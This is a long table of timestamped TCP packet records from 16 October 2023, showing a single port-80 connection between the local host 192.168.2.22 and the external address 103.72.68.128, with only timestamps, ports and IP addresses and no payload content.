Oct 16, 2023 09:58:27.363893986 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.363912106 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.363948107 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.363979101 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.364018917 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.364042044 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.364068985 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.364074945 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.364100933 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.364111900 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.364151001 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.364202976 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.364242077 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.364275932 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.364310980 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.364360094 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.364401102 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.364411116 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.364449978 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.364505053 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.364546061 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.364564896 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.364604950 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.365345001 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.367804050 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.367852926 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.367914915 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.367959023 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.367996931 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.367997885 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.368031025 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.368050098 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.368082047 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.368114948 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.368149996 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.368236065 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.368249893 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.368263960 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.368278027 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.368289948 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.368318081 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.368325949 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.368361950 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.368382931 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.368419886 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.368443012 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.368483067 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.368495941 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.368532896 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.368590117 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.368623972 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.368628025 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.368659019 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.368679047 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.368720055 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.368729115 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.368767023 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.368799925 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.368835926 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.368839979 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.368875027 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.368906975 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.368944883 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.368988991 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.369026899 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.369086981 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.369126081 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.369159937 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.369195938 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.369216919 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.369257927 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.369287968 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.369324923 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.369368076 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.369410038 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.369432926 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.369471073 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.369489908 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.369529963 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.369561911 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.369601965 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.369699955 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.369739056 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.369740963 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.369777918 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.369841099 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.369879007 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.369885921 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.369921923 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.369956970 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.369996071 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.370028019 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.370064974 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.370071888 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.370104074 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.370137930 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.370173931 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.370233059 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.370271921 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.370286942 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.370321989 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.370357037 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.370408058 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.370415926 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.370445013 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.370512962 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.370569944 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.370610952 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.370647907 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.370666981 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.370706081 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.370724916 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.370764017 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.370776892 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.370816946 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.370836020 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.370872974 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.370942116 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.370980024 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.370980978 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.371014118 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.371104002 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.371144056 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.371223927 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.371260881 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.371318102 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.371332884 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.371366024 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.371366978 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.371392012 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.371402025 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.371423960 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.371457100 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.371463060 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.371491909 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.371525049 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.371563911 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.371598005 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.371638060 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.371701002 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.371743917 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.371757984 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.371794939 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.372989893 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.373481035 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.713963032 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.713989019 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.714005947 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.714042902 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.714075089 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.714086056 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.714137077 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.714170933 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.714222908 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.714286089 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.714351892 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.714379072 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.714394093 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.714442968 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.714485884 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.714488983 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.714539051 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.714539051 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.714575052 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.714606047 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.714644909 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.714660883 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.714732885 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.714735985 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.714797020 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.714812040 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.714831114 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.714926004 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.714966059 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.714997053 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.715032101 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.715065002 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.715104103 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.715117931 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.715153933 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.715189934 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.715214968 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.715254068 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.715274096 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.715289116 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.715315104 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.715331078 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.715364933 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.715400934 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.715409994 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.715442896 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.715487957 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.715492964 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.715504885 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.715526104 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.715540886 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.715584040 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.715620995 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.715694904 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.715733051 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.715750933 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.715756893 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.715785980 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.715830088 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.715872049 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.715893030 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.715929985 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.715960979 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.716002941 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.716034889 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.716069937 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.716131926 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.716185093 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.716196060 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.716213942 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.716289997 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.716332912 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.716366053 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.716403008 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.716445923 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.716490984 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.716536045 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.716577053 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.716587067 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.716623068 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.716658115 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.716700077 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.716721058 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.716759920 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.716782093 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.716821909 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.716841936 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.716876984 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.716887951 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.716924906 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.716959000 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.716996908 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.717000008 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.717040062 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.717057943 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.717099905 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.717118979 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.717158079 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.717319012 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.717360973 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.717381001 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.717415094 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.717444897 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.717479944 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.717530012 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.717567921 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.717601061 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.717638969 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.717672110 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.717709064 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.717731953 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.717766047 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.717796087 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.717832088 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.717843056 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.717885017 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.717938900 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.717979908 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.718033075 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.718100071 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.718149900 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.718167067 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.718184948 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.718225956 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.718271017 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.718305111 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.718313932 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.718341112 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.718381882 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.718396902 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.718415976 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.718449116 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.718468904 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.718496084 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.718508959 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.718525887 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.718579054 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.718624115 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.718636990 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.718655109 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.718672037 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.718688965 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.718749046 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.718786955 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.718856096 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.718898058 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.718904972 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.718944073 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.718976021 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.719016075 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.719048977 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.719086885 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.719105959 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.719142914 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.719163895 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.719207048 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.719232082 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.719265938 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.719274998 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.719315052 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.719347954 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.719383001 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.719418049 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.719434023 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.719455957 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.719472885 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.719511032 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.719552994 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.719608068 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.719654083 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.719686985 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.719732046 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.719769001 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.719809055 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.719813108 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.719854116 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.719876051 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.719902992 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.719914913 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.719933987 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.719981909 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.720021963 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.720040083 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.720078945 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.720112085 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.720149040 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.720170021 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.720185041 CEST	80	49164	103.72.68.128	192.168.2.22
